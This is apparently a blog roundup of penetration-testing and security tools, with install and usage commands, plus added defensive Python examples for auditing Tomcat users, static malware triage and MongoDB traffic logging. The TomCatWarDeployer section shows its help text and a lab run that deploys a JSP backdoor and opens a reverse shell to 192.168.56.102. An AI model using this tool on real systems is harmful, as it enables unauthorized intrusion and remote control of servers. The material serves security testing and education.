Showing posts with label Kali Linux Tool.

NILI: A Tool For Network Scan, Man in the Middle, Protocol Reverse Engineering And Fuzzing


Installing


Here are the instructions for installing the prerequisites; follow the ones for your operating system.

Unix-like

1- Install Python3 and pip:

$ sudo apt-get install python3
$ sudo apt-get install python3-pip

2- Install Scapy:

$ cd /tmp
$ git clone https://github.com/phaethon/scapy

$ cd scapy
$ sudo python3 setup.py install

3- Install Netzob:

$ git clone https://dev.netzob.org/git/netzob
$ cd ./netzob/
$ sudo apt-get install python3 python3-dev python3-setuptools build-essential
$ python3 setup.py install
$ python3 -m pip install bintrees --upgrade


Windows

1- Install python3

2- Install Scapy:

2-1- Install Winpcap
2-2- Install Scapy3k

python -m pip install scapy-python3

3- Install Netzob

Download


RastLeak Tool To Automatic Leak Information Using Hacking With Search Engine


RastLeak: Tool to automatic leak information using Hacking with Search Engines

How to install

Install requirements with:

pip install -r requirements.txt

How to use:

python rastleak.py

The last stable version is rastleak.py

$ python rastleak.py -h

Usage: rastleak.py [-h] -d DOMAIN -o OPTION -n SEARCH -e EXT [-f EXPORT]

This script searchs files indexed in the main searches of a domain to detect a possible leak information

Optional Arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        The domain which it wants to search
  -o OPTION, --option OPTION
                        Indicate the option of search
                          1.Searching leak information into the target
                          2.Searching leak information outside target
  -n SEARCH, --search SEARCH
                        Indicate the number of the search which you want to do
  -e EXT, --ext EXT     Indicate the option of display:
                          1-Searching the domains where these files are found
                          2-Searching ofimatic files
  -f EXPORT, --export EXPORT
                        Indicate the type of format to export results.
                          1.json (by default)
                          2.xlsx

Download RastLeak

DMitry A Deepmagic Information Gathering Tool

Deepmagic Information Gathering Tool


DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU) Linux command line application written in C.

DMitry has the ability to gather as much information as possible about a host. Its base functionality can gather possible subdomains, email addresses, uptime information, a TCP port scan, whois lookups, and more. The information is gathered with the following methods:


  • Perform an Internet Number whois lookup.
  • Retrieve possible uptime data, system and server data.
  • Perform a SubDomain search on a target host.
  • Perform an E-Mail address search on a target host.
  • Perform a TCP Portscan on the host target.
  • A modular program allowing user-specified modules.

Download and installation

DMitry can be downloaded by issuing the following commands:

$ cd /data/src/
$ wget http://mor-pah.net/code/DMitry-1.3a.tar.gz


For installation, issue the following commands:

$ tar xzvf DMitry-1.3a.tar.gz
$ cd DMitry-1.3a/
$ ./configure
$ make
$ sudo make install

Then optionally create a symbolic link to your /pentest/ directory:

$ mkdir -p /pentest/enumeration/dmitry/
$ ln -s /usr/local/bin/dmitry /pentest/enumeration/dmitry/dmitry

Use

Help

DMitry help can be displayed by issuing:

$ dmitry --help

Download 

TomCatWarDeployer: Apache Tomcat Auto WAR Deployment And Pwning Penetration Testing Tool


Apache Tomcat auto WAR deployment & pwning penetration testing tool.


What is it?

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy a JSP backdoor, invoke it afterwards and provide a shell (either via a web GUI, a listening port bound on the remote machine, or a reverse TCP payload connecting back to the adversary).

In practice, it generates a JSP backdoor WAR package on the fly and deploys it through the Apache Tomcat Manager application, using valid HTTP authentication credentials provided by the pentester (or the defaults; in the end, we all love tomcat:tomcat).
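
The misconfiguration the tool depends on is easy to audit from the defender's side. As an added example (not part of TomCatWarDeployer), this script parses a tomcat-users.xml and reports accounts that hold a Manager role together with a default or weak password, or that combine manager-gui with manager-script; the sample XML and the weak-password list are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Roles that grant access to the Manager/Host Manager applications (Tomcat 7+).
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                 "admin-gui", "admin-script"}

# Passwords treated as default or trivially guessable (constructed list).
WEAK_PASSWORDS = {"", "tomcat", "s3cret", "admin", "password", "manager", "changeme"}


def _local(tag):
    """Strip a namespace so <user> and <{http://tomcat.apache.org/xml}user> match."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Report accounts that hold a Manager role together with a risky setup."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local(elem.tag) != "user":
            continue
        # Tomcat accepts either 'username' or 'name' for the account name.
        name = elem.get("username") or elem.get("name") or "<unnamed>"
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        manager_roles = roles & MANAGER_ROLES
        if not manager_roles:
            continue  # no Manager access: out of scope for this check
        problems = []
        if password.lower() in WEAK_PASSWORDS:
            problems.append("default or weak password")
        if password and password == name:
            problems.append("password equals username")
        # Tomcat's Manager documentation advises against giving the GUI and
        # script roles to one account, since the GUI role is exposed to CSRF.
        if {"manager-gui", "manager-script"} <= manager_roles:
            problems.append("manager-gui and manager-script on one account")
        if problems:
            findings.append({"user": name, "roles": sorted(manager_roles),
                             "problems": problems})
    return findings


# Constructed tomcat-users.xml: the stock tomcat:tomcat account beside a
# script-only deployment account with a long password and a non-manager user.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="hK3v!q9Lx2Tz8mWb" roles="manager-script"/>
  <user username="guest" password="guest" roles="tomcat"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```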

Usage

As simple as providing the server's address with port, as an IP:PORT pair. Here goes the help:

user$ python tomcatWarDeployer.py --help

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

Usage: tomcatWarDeployer.py [options] server

server    Specifies server address. Please also include port after colon.

Options:
  -h, --help     show this help message and exit

  General options:
    -v, --verbose       Verbose mode.
    -s, --simulate      Simulate breach only, do not perform any offensive
                        actions.
    -G OUTFILE, --generate=OUTFILE
                        Generate JSP backdoor only and put it into specified
                        outfile path then exit. Do not perform any
                        connections, scannings, deployment and so on.
    -U USER, --user=USER
                        Tomcat Manager Web Application HTTP Auth username.
                        Default="tomcat"
    -P PASS, --pass=PASS
                        Tomcat Manager Web Application HTTP Auth password.
                        Default="tomcat"


  Connection options:
    -H RHOST, --host=RHOST
                        Remote host for reverse tcp payload connection. When
                        specified, RPORT must be specified too. Otherwise,
                        bind tcp payload will be deployed listening on 0.0.0.0
    -p PORT, --port=PORT
                        Remote port for the reverse tcp payload when used with
                        RHOST or Local port if no RHOST specified thus acting
                        as a Bind shell endpoint.
    -u URL, --url=URL   Apache Tomcat management console URL. Default:
                        /manager/
    -t TIMEOUT, --timeout=TIMEOUT
                        Speciifed timeout parameter for socket object and
                        other timing holdups. Default: 10

Payload options:
    -R APPNAME, --remove=APPNAME
                        Remove deployed app with specified name. Can be used
                        for post-assessment cleaning
    -X PASSWORD, --shellpass=PASSWORD
                        Specifies authentication password for uploaded shell,
                        to prevent unauthenticated usage. Default: randomly
                        generated. Specify "None" to leave the shell
                        unauthenticated.
    -T TITLE, --title=TITLE
                        Specifies head>title for uploaded JSP WAR payload.
                        Default: "JSP Application"
    -n APPNAME, --name=APPNAME
                        Specifies JSP application name. Default: "jsp_app"
    -x, --unload        Unload existing JSP Application with the same name.
                        Default: no.
    -C, --noconnect     Do not connect to the spawned shell immediately. By
                        default this program will connect to the spawned
                        shell, specifying this option let's you use other
                        handlers like Metasploit, NetCat and so on.
    -f WARFILE, --file=WARFILE
                        Custom WAR file to deploy. By default the script will
                        generate own WAR file on-the-fly.

Sample usage against the Kevgir 1 VM by canyoupwn.me, running at 192.168.56.100:8080:

user$ python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: 192.168.56.102:4449.
DEBUG: Browsing to "http://192.168.56.100:8080/manager/"... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmpDhzo9I"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 547) (out= 253)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1595)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpDhzo9I
├── files
│   ├── META-INF
│   │   └── MANIFEST.MF
│   └── WEB-INF
│       └── web.xml
└── index.jsp

3 directories, 3 files
WARNING: Application with name: "jsp_app" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Succeeded.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpDhzo9I"
DEBUG: Succeeded, invoking it...
DEBUG: Spawned shell handling thread. Awaiting for the event...
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at 192.168.56.102:4449
DEBUG: Socket is binded to local port now, awaiting for clients...
DEBUG: Invoking application at url: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Adding 'X-Pass: oHI9mPB0mOnZ' header for shell functionality authentication.
DEBUG: Incoming client: 192.168.56.100:54251
INFO: JSP Backdoor up & running on http://192.168.56.100:8080/jsp_app/
INFO: Happy pwning. Here take that password for web shell: 'oHI9mPB0mOnZ'
DEBUG: Connected with the shell: tomcat7@canyoupwnme

tomcat7@canyoupwnme $ id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

tomcat7@canyoupwnme $ exit

The program sets up a local listener for the reverse-shell connection on the 192.168.56.102:4449 host (the local host), as in the example above. Then, after invoking the JSP backdoor, it automatically connects with the local listener, resulting in a shell being popped. One can also skip the -H parameter to use the bind-shell functionality, in which case, rather than setting up a local listener, the program connects to the bind shell listening remotely.

Finally, the above invocation results in the following JSP application, accessible remotely via the web:

[Screenshot: JSP backdoor GUI]

As one can see, a password is needed to use the deployed backdoor, preventing unauthenticated access during the assessment.

Summing up, the user has spawned a web application providing a web backdoor, authenticated via a POST 'password' parameter that can be specified by the user or randomly generated by the program. Then, upon receiving the X-Pass header in the invocation phase, the application spawned a reverse connection to our netcat handler. The HTTP header is required here so that a user refreshing the web GUI does not keep retrying the bind or reverse connection; it also puts that code behind authentication.

That would be all I guess.

CHANGELOG

19.07.16: Version 0.3: Added bind-shell & Reverse-shell functionality to provide user with direct access to the shell.

TODO


  1. Implement bind & reverse tcp payload functionality as well as some pty to interact with it
  2. Finish implementing noconnect and connect functionality
  3. Implement sort of communication authentication and encryption/encoding, to prevent flow of plain-text data through the wire/ether
  4. Test it on tomcat8
     

A2SV: Auto Scanning Tool To Find SSL Vulnerability

Auto Scanning to SSL Vulnerability



What is A2SV?

It is an auto-scanning tool for SSL vulnerabilities, covering Heartbleed, CCS Injection, SSLv3 POODLE, FREAK and more.

A. Supported Vulnerabilities

  • [CVE-2014-0160] CCS Injection
  • [CVE-2014-0224] HeartBleed
  • [CVE-2014-3566] SSLv3 POODLE
  • [CVE-2015-0204] FREAK Attack
  • [CVE-2015-4000] LOGJAM Attack
  • [CVE-2016-0703] SSLv2 DROWN

B. Dev Plan

  • [PLAN] SSL ACCF

2. How to Install?

A. Download (clone) & Unpack A2SV

git clone https://github.com/hahwul/a2sv.git
cd a2sv

B. Install Python Package / OpenSSL

pip install argparse
pip install netaddr

apt-get install openssl

C. Run A2SV

python a2sv.py -h


3. How to Use?

usage: a2sv.py [-h] [-t TARGET] [-p PORT] [-m MODULE] [-v]

Optional arguments:
-h, --help            show this help message and exit
-t TARGET, --target TARGET
                      Target URL/IP Address
-p PORT, --port PORT  Custom Port / Default: 443
-m MODULE, --module MODULE
                      Check SSL Vuln with one module
                      [h]: HeartBleed
                      [c]: CCS Injection
                      [p]: SSLv3 POODLE
                      [f]: OpenSSL FREAK
                      [l]: OpenSSL LOGJAM
                      [d]: SSLv2 DROWN
-u, --update          Update A2SV (GIT)
-v, --version         Show Version

[Scan SSL Vulnerability]
python a2sv.py -t 127.0.0.1
python a2sv.py -t 127.0.0.1 -m heartbleed
python a2sv.py -t 127.0.0.1 -p 8111

[Update A2SV]
python a2sv.py -u
python a2sv.py --update

Download 

CuckooDroid - Automated Android Malware Analysis Tool

CuckooDroid - Automated Android Malware Analysis


CuckooDroid - Automated Android Malware Analysis with Cuckoo Sandbox.



CuckooDroid is an extension of Cuckoo Sandbox, the open source software for automating the analysis of suspicious files; CuckooDroid brings to Cuckoo the capability to execute and analyze Android applications.

CuckooDroid features VM-detection techniques, encryption key extraction, SSL inspection, API call tracing and basic behavioural signatures. It also provides both static and dynamic APK inspection.

Installation - Easy integration script:

git config --global user.email "you@example.com"
git config --global user.name "Your Name"
git clone --depth=1 https://github.com/cuckoobox/cuckoo.git cuckoo -b 1.2
cd cuckoo
git remote add droid https://github.com/idanr1986/cuckoo-droid
git pull --no-edit -s recursive -X theirs droid master
cat conf-extra/processing.conf >> conf/processing.conf
cat conf-extra/reporting.conf >> conf/reporting.conf
rm -r conf-extra
echo "protobuf" >> requirements.txt

Download

Pompem - Exploit and Vulnerability Finder Pentester Tool

Exploit and Vulnerability Finder Pentester Tool




Pompem is an open source tool designed to automate the search for exploits and vulnerabilities in the most important databases.

It is developed in Python and has an advanced search system that helps the work of pentesters and ethical hackers. In the current version, it searches PacketStorm Security, CXSecurity, ZeroDay, Vulners, the National Vulnerability Database and the WPScan Vulnerability Database.

Source code

You can download the latest tarball by clicking here or latest zipball by clicking here.

You can also download Pompem directly from its Git repository:

$ git clone https://github.com/rfunix/Pompem.git

Dependencies

Pompem works out of the box with Python 3.5 on any platform and requires the following packages:

Requests 2.9.1+

Installation

Get Pompem up and running in a single command:

$ pip3.5 install -r requirements.txt

Usage

To get the list of basic options and information about the project:

$ python3.5 pompem.py -h

Options:

  -h, --help                               show this help message and exit
  -s, --search <keyword,keyword,keyword>   text for search
  --txt                                    Write txt File
  --html                                   Write html File

Examples of use:

$ python3.5 pompem.py -s Wordpress
$ python3.5 pompem.py -s Joomla --html
$ python3.5 pompem.py -s "Internet Explorer,joomla,wordpress" --html
$ python3.5 pompem.py -s FortiGate --txt
$ python3.5 pompem.py -s ssh,ftp,mysql

Download 

A Simple Static Malware Analyzer SSMA Tool Written in Python 3

A Simple Static Malware Analyzer SSMA Tool

SSMA is a simple malware analyzer written in Python 3. 


Features: 


  1. Analyze PE file’s header and sections (number of sections, entropy of sections/PE file, suspicious section names, suspicious flags in the characteristics of the PE file, etc.) 
  2. Searches for possible domains, e-mail addresses, IP addresses in the strings of the file. 
  3. Checks if domain is blacklisted based on abuse.ch’s Ransomware Domain Blocklist and malwaredomains.com’s blocklist. 
  4. Looks for Windows functions commonly used by malware. 
  5. Get results from VirusTotal and/or upload files. 
  6. Malware detection based on Yara-rules 
  7. Detect well-known software packers. 
  8. Detect the existence of cryptographic algorithms. 
  9. Detect anti-debug and anti-virtualization techniques used by malware to evade automated analysis. 
  10. Find if documents have been crafted to leverage malicious code. 
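
Features 1 and 2 are simple enough to show in a few lines. This added example is not SSMA's own code: it computes the Shannon entropy of each section, flags high-entropy or oddly named sections, and pulls domain, IPv4 and e-mail candidates out of the printable strings. It runs on constructed in-memory sections rather than a parsed PE file, and the 7.0 entropy threshold and the suspicious-name list are assumptions.

```python
import math
import random
import re
from collections import Counter

# Entropy at or above this is a common rule of thumb for packed or encrypted
# data; the exact cut-off is an assumption for this example, not an SSMA value.
HIGH_ENTROPY = 7.0

# Section names a stock linker does not emit (assumed, deliberately short list).
SUSPICIOUS_SECTION_NAMES = {"upx0", "upx1", ".aspack", ".adata", ".themida", ".vmp0"}

DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|info|biz|ru|cn|io)\b", re.I)
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
EMAIL_RE = re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def analyze_sections(sections):
    """sections: list of (name, raw_bytes) pairs. Returns one finding per section."""
    findings = []
    for name, raw in sections:
        ent = shannon_entropy(raw)
        flags = []
        if ent >= HIGH_ENTROPY:
            flags.append("high-entropy (packed/encrypted?)")
        if name.lower() in SUSPICIOUS_SECTION_NAMES:
            flags.append("suspicious section name")
        findings.append({"name": name, "size": len(raw),
                         "entropy": round(ent, 2), "flags": flags})
    return findings


def extract_strings(data: bytes, min_len: int = 4):
    """Runs of at least min_len printable ASCII bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def extract_iocs(data: bytes):
    """Domains, IPv4 addresses and e-mail addresses found in the file's strings."""
    text = "\n".join(extract_strings(data))
    emails = set(EMAIL_RE.findall(text))
    # The host part of an e-mail address is not reported a second time as a domain.
    email_hosts = {e.split("@", 1)[1].lower() for e in emails}
    domains = {d.lower() for d in DOMAIN_RE.findall(text)} - email_hosts
    return {"domains": sorted(domains), "ips": sorted(set(IPV4_RE.findall(text))),
            "emails": sorted(emails)}


# Constructed sample standing in for PE sections: repetitive code bytes, a data
# section with embedded strings, and a pseudo-random blob as a "packed" section.
_rng = random.Random(1234)
SAMPLE_SECTIONS = [
    (".text", bytes([0x55, 0x8B, 0xEC, 0x90]) * 256),
    (".data", b"\x00\x00update.evil-cdn.example.com\x00ping 192.168.56.101\x00"
              b"ops@evil-cdn.example.com\x00" + b"\x00" * 64),
    ("UPX1", bytes(_rng.getrandbits(8) for _ in range(4096))),
]

if __name__ == "__main__":
    for finding in analyze_sections(SAMPLE_SECTIONS):
        print(finding)
    print(extract_iocs(SAMPLE_SECTIONS[1][1]))
```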

Usage: 

git clone https://github.com/secrary/SSMA
cd SSMA
sudo pip3 install -r requirements.txt
python3 ssma.py -h
python3 ssma.py -k api-key file.exe

You can just statically scan the file, or upload it to VirusTotal using your API key.

python3 ssma.py file.exe
python3 ssma.py -k api-key file.exe

Download


Wireshark 2.2.0 Announced With New Features And Bug Fixes

Wireshark 2.2.0 Announced With Bug Fixes

Wireshark is a free and open source packet analyzer.

It is used for network troubleshooting, analysis, and software and communications protocol development. Formerly known as Ethereal, Wireshark lets the user put network interface controllers into a sniffing mode and view all live traffic in the Wireshark interface.

New Bug Fixes

  • Upgrading to latest version uninstalls Microsoft Visual C++ redistributable. (Bug 12712)
  • Extcap errors not reported back to UI. (Bug 11892)

The following features are new (or have been significantly updated) since version 2.2.0rc2:

  • No major changes since 2.2.0rc2.

The following features are new (or have been significantly updated) since version 2.2.0rc1:

  • "Decode As" supports SSL (TLS) over TCP.

The following features are new (or have been significantly updated) since version 2.1.1:

  • Invalid coloring rules are now disabled instead of discarded. This will provide backward compatibility with a coloring rule change in Wireshark 2.2.

The following features are new (or have been significantly updated) since version 2.1.0:

  • Added -d option for Decode As support in Wireshark (mimics TShark functionality)
  • The Qt UI, GTK+ UI, and TShark can now export packets as JSON. TShark can additionally export packets as Elasticsearch-compatible JSON.
  • The Qt UI now supports the -j, -J, and -l flags. The -m flag is now deprecated.
  • The Conversations and Endpoints dialogs are more responsive when viewing large numbers of items.
  • The RTP player now allows up to 30 minutes of silence frames.
  • Packet bytes can now be displayed as EBCDIC.
  • The Qt UI loads captures faster on Windows.
  • proto_tree_add_checksum was added as an API. This attempts to standardize how checksums are reported and filtered for within *Shark. There are no more individual "good" and "bad" filter fields, protocols now have a "checksum.status" field that records "Good", "Bad" and "Unverified" (neither good or bad). Color filters provided with Wireshark have been adjusted to the new display filter names, but custom ones may need to be updated.

The following features are new (or have been significantly updated) since version 2.0.0:

  • The intelligent scroll bar now sits to the left of a normal scroll bar and provides a clickable map of nearby packets.
  • You can now switch between Capture and File Format dissection of the current capture file via the View menu in the Qt GUI.
  • You can now show selected packet bytes as ASCII, HTML, Image, ISO 8859-1, Raw, UTF-8, a C array, or YAML.
  • You can now use regular expressions in Find Packet and in the advanced preferences.
  • Name resolution for packet capture now supports asynchronous DNS lookups only. Therefore the "concurrent DNS resolution" preference has been deprecated and is a no-op. To enable DNS name resolution some build dependencies must be present (currently c-ares). If that is not the case DNS name resolution will be disabled (but other name resolution mechanisms, such as host files, are still available).
  • The byte under the mouse in the Packet Bytes pane is now highlighted.
  • TShark supports exporting PDUs via the -U flag.
  • The Windows and OS X installers now come with the "sshdump" and "ciscodump" extcap interfaces.
  • Most dialogs in the Qt UI now save their size and positions.
  • The Follow Stream dialog now supports UTF-16.
  • The Firewall ACL Rules dialog has returned.
  • The Flow (Sequence) Analysis dialog has been improved.
  • We no longer provide packages for 32-bit versions of OS X.
  • The Bluetooth Device details dialog has been added.
Source: Wireshark




EncFS: An Encrypted Filesystem In User Space


EncFS: an Encrypted Filesystem for FUSE


EncFS provides an encrypted filesystem in user-space. It runs in userspace, using the FUSE library for the filesystem interface. EncFS is open source software, licensed under the LGPL.

EncFS is now over 10 years old (first release in 2003). It was written because older NFS and kernel-based encrypted filesystems such as CFS had not kept pace with Linux development.

EncFS encrypts individual files, by translating all requests for the virtual EncFS filesystem into the equivalent encrypted operations on the raw filesystem.



Status

Over the last 10 years, a number of good alternatives have grown up. Computing power has increased to the point where it is reasonable to encrypt the entire filesystem of personal computers (and even mobile phones!). On Linux, ecryptfs provides a nice dynamically mountable encrypted home directory.

EncFS has been dormant for a while. It is being cleaned up in order to provide a better base for a version 2, but whether EncFS flowers again depends upon community interest. In order to make it easier for anyone to contribute, it is moving to a new home on GitHub.

Unique Features

EncFS has a few features still not found anywhere else (as of Dec 2014) that may be interesting to you.

Reverse mode

encfs --reverse provides an encrypted view of an unencrypted folder. This enables encrypted remote backups using standard tools like rsync.

Fast on classical HDDs

EncFS is typically much faster than ecryptfs for stat()-heavy workloads when the backing device is a classical hard disk. This is because ecryptfs has to read each file header to determine the file size, which EncFS does not; that is one additional seek for each stat. See PERFORMANCE.md for detailed benchmarks on HDD, SSD and ramdisk.

Download EncFS

MongoDB-HoneyProxy: A Honeypot Proxy For MongoDB Server


When run, this will proxy and log all traffic to a dummy MongoDB server. MongoDB-HoneyProxy was created in response to the 'MongoDB Apocalypse'.

Pre-requisites:

  • sudo apt-get install nodejs npm gcc g++
  • You'll also need to install MongoDB for this to function, as this project works as a logging proxy.

Setup

  • Create a MongoDB database. Some good dummy data can be found here. Another good tool is JSON Generator, which generates fake JSON that can then be converted to BSON.
  • Then, install the project:

git clone https://github.com/Plazmaz/MongoDB-HoneyProxy.git
cd MongoDB-HoneyProxy
sudo npm install

To run the project, simply use node index.js
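
To see what such a logging proxy has to make of the bytes passing through it, here is an added example (not the HoneyProxy's own code, which is Node.js): it decodes the MongoDB wire-protocol header and, for OP_QUERY and OP_MSG, the command name and target database, so that a dropDatabase from an intruder is logged as more than a byte count. The two sample messages are constructed inline.

```python
import struct

# Opcodes of the MongoDB wire protocol.
OPCODES = {1: "OP_REPLY", 2001: "OP_UPDATE", 2002: "OP_INSERT", 2004: "OP_QUERY",
           2005: "OP_GET_MORE", 2006: "OP_DELETE", 2007: "OP_KILL_CURSORS",
           2012: "OP_COMPRESSED", 2013: "OP_MSG"}


def parse_header(buf):
    """16-byte little-endian header: messageLength, requestID, responseTo, opCode."""
    if len(buf) < 16:
        raise ValueError("message shorter than the 16-byte header")
    length, request_id, response_to, opcode = struct.unpack_from("<iiii", buf, 0)
    return {"length": length, "request_id": request_id, "response_to": response_to,
            "opcode": OPCODES.get(opcode, "UNKNOWN(%d)" % opcode)}


def _cstring(buf, pos):
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("utf-8"), end + 1


def parse_bson_scalars(buf, pos):
    """Decode the top level of the BSON document at pos into an ordered dict.
    Scalars are decoded; embedded documents/arrays are skipped by their length;
    any other type ends decoding, since its size is not known to this reader."""
    doc_len, = struct.unpack_from("<i", buf, pos)
    end, pos, fields = pos + doc_len, pos + 4, {}
    while pos < end - 1:  # the document ends with a single 0x00 byte
        etype, pos = buf[pos], pos + 1
        name, pos = _cstring(buf, pos)
        if etype == 0x01:                       # double
            fields[name], = struct.unpack_from("<d", buf, pos); pos += 8
        elif etype == 0x02:                     # string: int32 length incl. NUL
            slen, = struct.unpack_from("<i", buf, pos); pos += 4
            fields[name] = buf[pos:pos + slen - 1].decode("utf-8"); pos += slen
        elif etype in (0x03, 0x04):             # document / array: skip whole
            sub_len, = struct.unpack_from("<i", buf, pos)
            fields[name] = "<document>" if etype == 0x03 else "<array>"; pos += sub_len
        elif etype == 0x08:                     # boolean
            fields[name] = bool(buf[pos]); pos += 1
        elif etype == 0x10:                     # int32
            fields[name], = struct.unpack_from("<i", buf, pos); pos += 4
        elif etype == 0x12:                     # int64
            fields[name], = struct.unpack_from("<q", buf, pos); pos += 8
        else:
            fields[name] = "<type 0x%02x>" % etype
            break
    return fields, end


def describe(buf):
    """What a logging proxy should record per message: opcode, target and command."""
    hdr, pos = parse_header(buf), 16
    entry = {"op": hdr["opcode"], "target": None, "command": None, "fields": {}}
    if hdr["opcode"] == "OP_QUERY":
        pos += 4                                 # flags
        ns, pos = _cstring(buf, pos)             # "db.collection" or "db.$cmd"
        pos += 8                                 # numberToSkip, numberToReturn
        query, _ = parse_bson_scalars(buf, pos)
        entry.update(target=ns, fields=query,
                     command=next(iter(query), None) if ns.endswith(".$cmd") else None)
    elif hdr["opcode"] == "OP_MSG":
        pos += 4                                 # flagBits
        if buf[pos] == 0:                        # section kind 0: the command body
            body, _ = parse_bson_scalars(buf, pos + 1)
            entry.update(target=body.get("$db"), command=next(iter(body), None),
                         fields=body)
    return entry


def _bson(fields):
    """Encode a flat dict of str/int values as BSON (only to build sample input)."""
    body = b""
    for name, value in fields.items():
        if isinstance(value, str):
            s = value.encode("utf-8") + b"\x00"
            body += b"\x02" + name.encode() + b"\x00" + struct.pack("<i", len(s)) + s
        else:
            body += b"\x10" + name.encode() + b"\x00" + struct.pack("<i", value)
    return struct.pack("<i", len(body) + 5) + body + b"\x00"


def _message(opcode, payload, request_id=1):
    return struct.pack("<iiii", 16 + len(payload), request_id, 0, opcode) + payload


# Constructed samples: a dropDatabase command, the kind of destructive action the
# "MongoDB Apocalypse" campaign performed, over the legacy OP_QUERY command path
# ("<db>.$cmd") and over OP_MSG as used by MongoDB 3.6+ drivers.
SAMPLE_OP_QUERY = _message(2004, struct.pack("<i", 0) + b"customers.$cmd\x00" +
                           struct.pack("<ii", 0, -1) + _bson({"dropDatabase": 1}))
SAMPLE_OP_MSG = _message(2013, struct.pack("<I", 0) + b"\x00" +
                         _bson({"dropDatabase": 1, "$db": "customers"}))

if __name__ == "__main__":
    for raw in (SAMPLE_OP_QUERY, SAMPLE_OP_MSG):
        print(describe(raw))
```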

Download

Vulners: Software Vulnerability Scanner Plugin For Burp Suite Professional


Vulners scanner plugin released for automatic vulnerability detection in passive scan mode


vulnersCom/burp-vulners-scanner Vulnerability scanner based on vulners.com search API


Burp Suite scanner plugin based on Vulners.com vulnerability database API

  • Searches for fingerprints in HTTP responses (inspired by the "Software Version Reporter" plugin) and checks the found version against the vulners.com vulnerability database.
  • [Experimental] Checks unique URLs against vulners.com to find exploits for such paths.

If the Vulners plugin detects vulnerable software, it shows you the CVE, advisories and even applicable exploits.

Requirements

  • Burp Suite - Professional Edition
  • Java 1.7
  • Maven

Installation

  • Clone the repository
  • From the command line run mvn package
  • Find burp-vulners-scanner.jar in the /target folder
  • Open Burp Suite -> Extender -> Add -> path to plugin.jar

Build

Ready-to-install build: burp-vulners-scanner.jar

Software vulnerability scanner plugin for Burp Suite Professional. Main functionality:

  • Detect vulnerable software by discovered fingerprints in HTTP responses
  • Check unique URLs, finding exploits with such paths

EAST: Exploits And Security Tools For Penetration Testing Framework

Security Tools For Penetration Testing Framework




A pentest framework is the basis of an IT security specialist's toolkit. Such software is essential both for learning about and improving one's knowledge of attacks on IT systems, and for inspections and proactive protection.

The need for a comprehensive, native, open source pentest framework with a high level of trust has existed for a long time. That is why the EAST framework was created for native and native-friendly IT security markets. EAST is a framework that has all the resources needed to run a wide range of exploits, from web to buffer overruns. EAST differs from similar toolkits by its ease of use: even a beginner can handle it and start to advance in IT security.


Main features:

  • Framework security. Software used for IT security must have a high level of user trust. EAST is implemented in open source Python code that is easy to check; it is used for all parts of the framework and its modules. The relatively small amount of code eases verification by any user. No OS changes are applied during installation.
  • Maximum simplicity. Download the archive and launch the main Python script start.py, which starts and stops exploits and handles message traffic. Everything is handled locally or remotely via a browser.
  • Simple creation and editing of exploits. Modules and exploits can be edited and added on the fly without a restart. A module's code body is small and easy to follow.
  • Cross-platform with minimal requirements and dependencies. Tested on Windows and Linux; it should work anywhere Python is installed. The framework ships with all its dependencies and does not download additional libraries.
